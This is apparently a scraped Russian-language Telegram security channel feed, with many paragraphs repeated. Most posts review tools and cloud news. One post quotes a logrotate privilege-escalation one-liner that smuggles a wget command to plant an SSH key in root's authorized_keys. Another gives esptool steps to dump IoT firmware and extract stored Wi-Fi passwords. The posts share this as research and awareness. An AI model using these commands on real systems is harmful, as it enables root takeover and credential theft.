Журналов по кибер-безопасности много, а по физической безопасности почти ничего нет.
Почти.
Нашёл Journal of Physical Security, бесплатное онлайн-издание, посвященное физическим аспектам безопасности.
Выпусков мало, (выходят раз в год, пока что 15 штук, в этом году пока ничего нет), зато хорошие.
Почти.
Нашёл Journal of Physical Security, бесплатное онлайн-издание, посвященное физическим аспектам безопасности.
Выпусков мало, (выходят раз в год, пока что 15 штук, в этом году пока ничего нет), зато хорошие.
Right Brain Sekurity
JPS
The Journal of Physical Security
Forwarded from SecOps среди берёз
Искал медь, а нашёл золото.
Искал книги из далёкого прошлого: "Телевидение?.. Это очень просто!", "Радио?.. Это очень просто!" за авторством Евгения Айсберга и "Занимательная физика" за авторством Якова Перельмана.
Книги из периода 1960-1990 годов, разброс большой, но убил сразу двух зайцев.
- сайт с книгами publ.lib.ru. Это уже отдельно взятый артефакт из начала двухтысячных. Если вы не застали веб тех времен, вам стоит глянуть на этот монумент.
- Сами книги. Издания за разные годы, в куче вариантов. Очевидно, что большая часть в djvu, но оно того стоит.
Торрентом бы это всё утащить было бы отлично, но ничего похожего не нашёл.
P.S. Ссылки на книги, если кому-то интересно:
Телевидение?.. Это очень просто!
Радио?.. Это очень просто!
Занимательная физика. Книга 1.
Занимательная физика. Книга 2.
Искал книги из далёкого прошлого: "Телевидение?.. Это очень просто!", "Радио?.. Это очень просто!" за авторством Евгения Айсберга и "Занимательная физика" за авторством Якова Перельмана.
Книги из периода 1960-1990 годов, разброс большой, но убил сразу двух зайцев.
- сайт с книгами publ.lib.ru. Это уже отдельно взятый артефакт из начала двухтысячных. Если вы не застали веб тех времен, вам стоит глянуть на этот монумент.
- Сами книги. Издания за разные годы, в куче вариантов. Очевидно, что большая часть в djvu, но оно того стоит.
Торрентом бы это всё утащить было бы отлично, но ничего похожего не нашёл.
P.S. Ссылки на книги, если кому-то интересно:
Телевидение?.. Это очень просто!
Радио?.. Это очень просто!
Занимательная физика. Книга 1.
Занимательная физика. Книга 2.
❤1
RSS формат старый, но ещё применимый. Если следите за новостями, нет необходимости лезть в браузер и листать ленту.
Выбрал фиды, закинул в ридер и всё.
Сделал небольшую подборку security-related RSS фидов:
- в блоге
- сырой markdown
P.S. Собрал пару фидов в wtfutil, вроде даже удобно.
Выбрал фиды, закинул в ридер и всё.
Сделал небольшую подборку security-related RSS фидов:
- в блоге
- сырой markdown
P.S. Собрал пару фидов в wtfutil, вроде даже удобно.
29a µ blog
Security RSS Feed
SecurityLab SecurityLab: Основной RSS канал SecurityLab: Новости SecurityLab: Уязвимости SecurityLab: Конкурсы SecurityLab: Статьи SecurityLab: Софт
👍2👏1
Устроим вечер hex-редакторов
Если вы не реверсер, то hex-редактор в вашем арсенале штука не самая важная, а по этой причине чаще используется то, что под рукой: hexedit, hexeditor, xxd.
Но hexedit хоть и функционален, но не очень удобен, hexeditor вызывает инфаркт глаз, а xxd хоть и хорош, но довольно красноглаз и уместен скорей в пайплайнах.
Сегодня посмотрим на несколько редакторов, достойных внимания.
GUI:
HexWalk
ImHex
CLI:
vim-hexedit
hexcurse
Если вы не реверсер, то hex-редактор в вашем арсенале штука не самая важная, а по этой причине чаще используется то, что под рукой: hexedit, hexeditor, xxd.
Но hexedit хоть и функционален, но не очень удобен, hexeditor вызывает инфаркт глаз, а xxd хоть и хорош, но довольно красноглаз и уместен скорей в пайплайнах.
Сегодня посмотрим на несколько редакторов, достойных внимания.
GUI:
HexWalk
ImHex
CLI:
vim-hexedit
hexcurse
HexWalk - это кроссплатформеный Hex-редактор.
Основан на таких проектах с открытым исходным кодом, как qhexedit2, binwalk и QT.
Функционал:
- Advanced Find (поиск шаблонов в бинарных файлах на основе HEX, UTF8, UTF16 и regex).
- Интеграция с Binwalk
- Анализ энтропии
- Калькулятор хэшей
- Конвертер Bin/Dec/Hex
- Редактирование шестнадцатеричных файлов
- Diff-анализ файлов
- Byte Patterns для разбора заголовков
Для использования функционала binwalk, сам binwalk должен быть установлен. Для Linux достаточно установки из пакетного менеджера, в Windows уже свои особенности.
QT5 продолжает оскорблять чувства эстетов, но gui к binwalk это хорошо. (хоть и не критически необходимо).
Основан на таких проектах с открытым исходным кодом, как qhexedit2, binwalk и QT.
Функционал:
- Advanced Find (поиск шаблонов в бинарных файлах на основе HEX, UTF8, UTF16 и regex).
- Интеграция с Binwalk
- Анализ энтропии
- Калькулятор хэшей
- Конвертер Bin/Dec/Hex
- Редактирование шестнадцатеричных файлов
- Diff-анализ файлов
- Byte Patterns для разбора заголовков
Для использования функционала binwalk, сам binwalk должен быть установлен. Для Linux достаточно установки из пакетного менеджера, в Windows уже свои особенности.
QT5 продолжает оскорблять чувства эстетов, но gui к binwalk это хорошо. (хоть и не критически необходимо).
ImHex - hex-редактор для серьезных ребят.
Как описывает автор: "A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM."
Функционал богатый и поддерживает множество архитектур за счёт использования Capstone (ARM64 и MISP везде есть, но и пусть тут будет). А так же есть поддержка правил Yara.
Кроме того, расширяется плагинами прямо из самого редактора.
И тёмная тема по умолчанию, это довольно важно. И Wikipedia term definition finder.
А ещё можно пощупать ImHex онлайн тут.
Как описывает автор: "A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM."
Функционал богатый и поддерживает множество архитектур за счёт использования Capstone (ARM64 и MISP везде есть, но и пусть тут будет). А так же есть поддержка правил Yara.
Кроме того, расширяется плагинами прямо из самого редактора.
И тёмная тема по умолчанию, это довольно важно. И Wikipedia term definition finder.
А ещё можно пощупать ImHex онлайн тут.
🔥1
hexcurse - что-то попроще не вылезая из консоли.
hexcurse - малоизвестная классика среди hex-редакторов.
Стандартный, двухпанельный ncurses-редактор без особых изысков.
Не смотря на то, что проект заброшен (последний коммит от 2018), hexcurse вполне актуален и доступен в репозиториях.
Как и для всех инструментов, работающих в cli, стоит ознакомится с шорткатами.
hexcurse - малоизвестная классика среди hex-редакторов.
Стандартный, двухпанельный ncurses-редактор без особых изысков.
Не смотря на то, что проект заброшен (последний коммит от 2018), hexcurse вполне актуален и доступен в репозиториях.
Как и для всех инструментов, работающих в cli, стоит ознакомится с шорткатами.
👍1
vim-hexedit - плагин для VIM, который расширяет встроенные возможности.
Проект заброшен автором, работоспособность под вопросом.
Как и под вопросом необходимость hex-редактора в vim.
В прочем, это уже другая история.
Если пользователь vim может что-то сделать через vim, но именно так и поступит.
Проект заброшен автором, работоспособность под вопросом.
Как и под вопросом необходимость hex-редактора в vim.
В прочем, это уже другая история.
Если пользователь vim может что-то сделать через vim, но именно так и поступит.
GitHub
GitHub - rootkiter/vim-hexedit: Hexedit is a plug-in under VIM, which is used to strengthen the hex editing ability of VIM.
Hexedit is a plug-in under VIM, which is used to strengthen the hex editing ability of VIM. - rootkiter/vim-hexedit
👍1
И наконец, самый простой вариант hexed.it - hex-редактор работающий в браузере.
Основной функционал на месте, если нужно посмотреть\изменить небольшой файл здесь и сейчас, то вполне себе вариант.
Основной функционал на месте, если нужно посмотреть\изменить небольшой файл здесь и сейчас, то вполне себе вариант.
HexEd.it
HexEd.it - Browser-based Online and Offline Hex Editing
HexEd.it is a free hex editor for Windows, MacOS, Linux and all other modern operating systems, which uses HTML5 and JavaScript (JS) technology to enable hexediting online, directly in your browser.
❤2
root with a single command: sudo logrotate
Вопрос: что может произойти, если пользователь может запустить только
Кажется, что если sudoers выглядит так
Но путём хитрых манипуляций logrotate поможет получить root:
Вопрос: что может произойти, если пользователь может запустить только
sudo logrotate?Кажется, что если sudoers выглядит так
user ALL=(ALL:ALL) NOPASSWD: /usr/sbin/logrotate *то проблем быть не должно.
Но путём хитрых манипуляций logrotate поможет получить root:
sudo logrotate -l /etc/cron.daily/man-db '2>/dev/null;wget host/ssh.key -O /root/.ssh/authorized_keys2; exit 0;'Интересное исследование интересного вектора атаки. Советую почитать целиком.
Joshua Rogers’ Scribbles
root with a single command: sudo logrotate
Starting from the constraint that only sudo logrotate * may be run, and ending at root: abusing the log file flag to overwrite root owned scripts and ride cron to privilege escalation.
👍5
Detect Wi-Fi deauthentication attack using ESP8266 and receive notification on smartphone
Как с помощьюбулки хлеба и отверток ESP8266 детектить deauth атаки на Wi-Fi и не привлекать внимания санитаров получать SMS-оповещения.
Автор использует DeauthDetector, немного расширяя его функционал.
Выглядит довольно своеобразно, но как PoC выглядит интересно.
Как с помощью
Автор использует DeauthDetector, немного расширяя его функционал.
Выглядит довольно своеобразно, но как PoC выглядит интересно.
Mobile Hacker
Detect Wi-Fi deauthentication attack using ESP8266 and receive notification on smartphone Mobile Hacker
A Wi-Fi deauthentication attack, also known as a "deauth attack" or "disassociation attack," is a type of denial-of-service that targets wireless networks. The primary goal of this attack is to disconnect or deauthenticate devices (such as smartphones, laptops…
👍1🫡1
ipapi.is: How to build a IP Geolocation Database from Scratch?
Интересный и довольно простой подход в сборе своей базы geoip:
собрали данные у региональных интернет-регистраторов, обогатили данные и получили продукт на выходе.
Сами базы geoip в открытом доступе и их можно скачать.
Интересный и довольно простой подход в сборе своей базы geoip:
собрали данные у региональных интернет-регистраторов, обогатили данные и получили продукт на выходе.
Сами базы geoip в открытом доступе и их можно скачать.
ipapi.is
ipapi.is - Geolocation
ipapi.is offers precise IP data via a user-friendly API, encompassing geolocation, ASN data, hosting detection, VPN detection, and proxy detection.
Пиджаки в облаках. AWS для ЦРУ.
AWS большой облачный провайдер, с множеством дата-центров, регионов, сервисов и множеством удобных вещей.
Но очевидно, что AWS это не только public cloud и free tier для VPN, но и множество вещей, скрытых от обычного пользователя.
Disclaimer
Данная статья не является “срывом покровов”, долгосрочным результатом работы кибер-разведки, или иной формой откровения. Это наглядный пример, что немалое количество информации можно получить просто почитав документацию и файлы конфигурации.
Это применимо не только к основному продукту, но и к сторонним инструментам.
AWS большой облачный провайдер, с множеством дата-центров, регионов, сервисов и множеством удобных вещей.
Но очевидно, что AWS это не только public cloud и free tier для VPN, но и множество вещей, скрытых от обычного пользователя.
Disclaimer
Данная статья не является “срывом покровов”, долгосрочным результатом работы кибер-разведки, или иной формой откровения. Это наглядный пример, что немалое количество информации можно получить просто почитав документацию и файлы конфигурации.
Это применимо не только к основному продукту, но и к сторонним инструментам.
Forwarded from SecOps среди берёз
Youtube решил довольно своеобразно бороться с блокировщиками рекламы.
Правда оно может не работать и с выключенным блокировщиком. ¯\_(ツ)_/¯
На r/uBlockOrigin нашли решение по обходу блокировки блокировщиков.
Правда оно может не работать и с выключенным блокировщиком. ¯\_(ツ)_/¯
На r/uBlockOrigin нашли решение по обходу блокировки блокировщиков.
Небольшое исследование от Cloud Security Partners.
Около 5% процентов от их клиентов держат AWS RDS в публичном доступе. Да, процент довольно небольшой, но это отдельно взятый случай, фактически их куда больше.
Эта тенденция может не слишком распространена, но для многих пользователей о ней важно знать - особенно для тех, кто предъявляет строгие требования к соблюдению нормативных требований. Но в любом случае, суть статьи: держите вещи подальше от публичного Интернета, если они там не нужны. В большинстве случаев RDS это не требует.
RDS имеет несколько платформ баз данных (не только MySQL), которые могут выбирать пользователи, и среди них есть несколько различных поддерживаемых вариантов аутентификации, которые описаны в документации - Database authentication with Amazon RDS. Таким образом, угроза заключается не только в атаке с подбором пароля, но и в компрометации пользователя IAM или через компрометацию Kerberos. Ситуация с компрометацией учетных данных пользователя более вероятна.
Хотя URL-адрес экземпляра трудно угадать, его можно узнать просмотрев исходный код. Например, поиск us-west-1.rds.amazonaws.com в поиске кода на GitHub дает более 1.8k совпадений файлов и более 5k для us-west-2.rds.amazonaws.com. И при просмотре публичных (в частных наверняка тоже) репозиториев кода довольно часто встречаются строки подключения к базам данных.
Рекомендации:
- Проверяйте RDS на общедоступность
- Если ресурсы невозможно развернуть в одном VPC, используйте пиринг VPC, чтобы обеспечить подключение к внутренней сети.
Около 5% процентов от их клиентов держат AWS RDS в публичном доступе. Да, процент довольно небольшой, но это отдельно взятый случай, фактически их куда больше.
Эта тенденция может не слишком распространена, но для многих пользователей о ней важно знать - особенно для тех, кто предъявляет строгие требования к соблюдению нормативных требований. Но в любом случае, суть статьи: держите вещи подальше от публичного Интернета, если они там не нужны. В большинстве случаев RDS это не требует.
RDS имеет несколько платформ баз данных (не только MySQL), которые могут выбирать пользователи, и среди них есть несколько различных поддерживаемых вариантов аутентификации, которые описаны в документации - Database authentication with Amazon RDS. Таким образом, угроза заключается не только в атаке с подбором пароля, но и в компрометации пользователя IAM или через компрометацию Kerberos. Ситуация с компрометацией учетных данных пользователя более вероятна.
Хотя URL-адрес экземпляра трудно угадать, его можно узнать просмотрев исходный код. Например, поиск us-west-1.rds.amazonaws.com в поиске кода на GitHub дает более 1.8k совпадений файлов и более 5k для us-west-2.rds.amazonaws.com. И при просмотре публичных (в частных наверняка тоже) репозиториев кода довольно часто встречаются строки подключения к базам данных.
Рекомендации:
- Проверяйте RDS на общедоступность
aws rds describe-db-instances --profile your-profile | jq -r ".DBInstances[] | select(.PubliclyAccessible == true)"- По возможности развертывайте экземпляры RDS в том же VPC, что и серверы приложений.
- Если ресурсы невозможно развернуть в одном VPC, используйте пиринг VPC, чтобы обеспечить подключение к внутренней сети.
Cloud Security Partners Blog
RDS Revealed? Time to Give It Some Shade!
By: John Poulin
At Cloud Security Partners, we have audited thousands of customer AWS accounts as part of our security reviews. Across our customers, roughly 5% of the AWS Relational Database Service (RDS) instances we analyze are publicly accessible. A…
At Cloud Security Partners, we have audited thousands of customer AWS accounts as part of our security reviews. Across our customers, roughly 5% of the AWS Relational Database Service (RDS) instances we analyze are publicly accessible. A…
👍1
Forwarded from SecOps среди берёз
It's Alive!
Youtube-канал Androkavo ожил и после почти пяти лет молчания выпустил видео.
Если вы не понимаете, о чём я: Androkavo один из самых крутых каналов, посвященных пайке. Никакого бубнежа за кадром, только паяльник, припой, флюс и филигранная работа.
Если вы любите запахнапалма припоя поутру, канал обязателен к просмотру.
Youtube-канал Androkavo ожил и после почти пяти лет молчания выпустил видео.
Если вы не понимаете, о чём я: Androkavo один из самых крутых каналов, посвященных пайке. Никакого бубнежа за кадром, только паяльник, припой, флюс и филигранная работа.
Если вы любите запах
YouTube
Soldering Iron And Temperature
Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.
Что такое матрица MITRE ATT&CK ? Обзор, основные сведения и сценарии применения
Хорошее обзорное видео MITRE ATT&CK. Немного истории, варианты применения и пара сценариев из опыта.
Вообще по MITRE ATT&CK материалов на русском не очень много, что довольно странно, так как штука полезная.
Хорошее обзорное видео MITRE ATT&CK. Немного истории, варианты применения и пара сценариев из опыта.
Вообще по MITRE ATT&CK материалов на русском не очень много, что довольно странно, так как штука полезная.
YouTube
Что такое матрица MITRE ATT&CK ? Обзор, основные сведения и сценарии применения
Обзорное видео, в котором мы с Юрием Тихоглазом решили осветить базовые понятия о матрице MITRE ATT&ACK, рассказать, каким образом и где она применяется, и предложить несколько сценариев из нашего профессионального опыта, в которых её использование может…
AWS Digital Sovereignty Pledge: Announcing a new, independent sovereign cloud in Europe
Небольшая новость от AWS. Они запускают "суверенное облако" в Европе. Деталей в новости нет, но вероятно это и есть AWS ISOE (про который я писал ранее). У AWS много точек присутсвия (8 регионов и 24 зоны доступности) и казалось бы, что ничего нового. Но судя по всему, расчет идёт на более требовательную публику, вроде здравоохранения, банков и правительства.
Небольшая новость от AWS. Они запускают "суверенное облако" в Европе. Деталей в новости нет, но вероятно это и есть AWS ISOE (про который я писал ранее). У AWS много точек присутсвия (8 регионов и 24 зоны доступности) и казалось бы, что ничего нового. Но судя по всему, расчет идёт на более требовательную публику, вроде здравоохранения, банков и правительства.
Amazon
AWS Digital Sovereignty Pledge: Announcing a new, independent sovereign cloud in Europe | Amazon Web Services
August 4, 2025: We updated this post to include EU resident citizenship requirements for AWS European Sovereign Cloud employees operating the cloud. French | German | Italian | Spanish From day one, Amazon Web Services (AWS) has always believed it is essential…
Забытый IoT как способ попасть в сеть.
IoT штука удобная. Включать свет, двигать шторы, перекрывать воду и многое другое можно делать с телефона. Красота.
Разумеется, заботливые производители привязывают свои железки к своим облачным сервисам, а неблагодарные пользователи не хотят и прошивают купленные на свои кровные устройства кастомными прошивками.
Но, разумеется, и это перекрывает не все проблемы.
При наличии физического доступа к устройству можно извлечь имя точки доступа и пароль.
Рассмотрим на примере проекта WLED на ESP8266.
Нам потребуются:
1. Сам ESP8266
2. Программатор USB-UART (в моём случае будет Flipper Zero)
3. 4 соединительных провода
4. макетная плата (опционально)
5. esptool и pyserial (не обязательно он, мне так удобней смотреть порт USB-UART)
Подключаемся:
1. Подпаиваемся или ставим на макетку наш ESP8266.
2. Подключаем USB-UART
3. Проверяем, что порт на месте
5. Опрашиваем ESP для проверки корректности работы:
6. Дампим прошивку:
Да, я не могу назвать это каким-то сложным и полезным ресёрчем, но это показывает, что умные реле, лампочки и прочий IoT хранит пароли в открытом виде.
Для полноты картины надо будет проверить на других устройствах с родными прошивками, но тут уж как получится.
И не забывайте, s in IoT stands for security.
IoT штука удобная. Включать свет, двигать шторы, перекрывать воду и многое другое можно делать с телефона. Красота.
Разумеется, заботливые производители привязывают свои железки к своим облачным сервисам, а неблагодарные пользователи не хотят и прошивают купленные на свои кровные устройства кастомными прошивками.
Но, разумеется, и это перекрывает не все проблемы.
При наличии физического доступа к устройству можно извлечь имя точки доступа и пароль.
Рассмотрим на примере проекта WLED на ESP8266.
Нам потребуются:
1. Сам ESP8266
2. Программатор USB-UART (в моём случае будет Flipper Zero)
3. 4 соединительных провода
4. макетная плата (опционально)
5. esptool и pyserial (не обязательно он, мне так удобней смотреть порт USB-UART)
Подключаемся:
1. Подпаиваемся или ставим на макетку наш ESP8266.
2. Подключаем USB-UART
3. Проверяем, что порт на месте
pyserial-ports -v
/dev/ttyACM0
desc: Flippername
hwid: USB VID:PID=0333:4542 SER=flip_flippername LOCATION=1-1:1.0
1 ports found
4. Переводим плату в режим прошивки. Для этого нажимаем и удерживаем кнопку FLASH, нажимаем кнопку RST и отпускаем. После перезагрузки диод гореть не должен. 5. Опрашиваем ESP для проверки корректности работы:
esptool --baud 115200 --chip esp8266 --port /dev/ttyACM0 chip_id
Если всё сделано верно, мы получим информацию о плате.6. Дампим прошивку:
esptool --baud 115200 --port /dev/ttyACM0 read_flash 0x00000 0x400000 flash2_4M.bin
6. По окончанию загрузки нам потребуется просто посмотреть строки в файле:strings flash2_4M.bin| grep "psk"
strings flash2_4M.bin| grep "ssid"
И мы получаем имя точки доступа и пароль.Да, я не могу назвать это каким-то сложным и полезным ресёрчем, но это показывает, что умные реле, лампочки и прочий IoT хранит пароли в открытом виде.
Для полноты картины надо будет проверить на других устройствах с родными прошивками, но тут уж как получится.
И не забывайте, s in IoT stands for security.
Хорошие новости подвезли.
У sshfs появился мейнтейнер и проект больше не orphaned.
Пока что обновился readme и начались хоть какие-то именения в коде.
Пока что радоваться особо нечему, но новость даёт надежды на продолжение жизни проекта.
Для тех, кто пропустил:
Предыдущий мейнтейнер Nikolaus Rath по каким-то своим причинам оставил проект в 2022, после чего проект оставался в "осиротевшем" состоянии.
У sshfs появился мейнтейнер и проект больше не orphaned.
Пока что обновился readme и начались хоть какие-то именения в коде.
Пока что радоваться особо нечему, но новость даёт надежды на продолжение жизни проекта.
Для тех, кто пропустил:
Предыдущий мейнтейнер Nikolaus Rath по каким-то своим причинам оставил проект в 2022, после чего проект оставался в "осиротевшем" состоянии.
GitHub
No longer orphaned · libfuse/sshfs@551752c
A network filesystem client to connect to SSH servers - No longer orphaned · libfuse/sshfs@551752c
А тут Scapy в браузере появился.
Есть ограничения:
- не работают функции ввода/вывода (send, sr, sniff и т.д.).
- Все, что использует внешние пакеты (matplotlib, pyx и прочее) не поддерживается.
Есть ограничения:
- не работают функции ввода/вывода (send, sr, sniff и т.д.).
- Все, что использует внешние пакеты (matplotlib, pyx и прочее) не поддерживается.